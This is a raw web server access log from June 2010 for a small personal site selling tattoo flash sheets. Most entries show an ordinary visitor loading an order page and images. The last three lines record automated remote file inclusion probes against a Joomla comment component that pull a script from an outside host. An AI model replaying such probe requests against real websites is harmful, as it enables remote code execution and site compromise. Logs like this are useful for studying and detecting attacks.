212.162.255.4 - - [02/Jun/2010:09:19:14 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.co.uk/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&channel=s&q=vintage++tattoo+flash+sheets&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:15 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:15 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:15 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:15 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:15 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
212.162.255.4 - - [02/Jun/2010:09:19:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
216.245.220.19 - - [02/Jun/2010:09:19:16 -0500] "GET /logs/access_log.1271635200/?option=com_webeecomment&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.245.220.19 - - [02/Jun/2010:09:19:16 -0500] "GET /?option=com_webeecomment&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.245.220.19 - - [02/Jun/2010:09:19:16 -0500] "GET /logs/?option=com_webeecomment&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
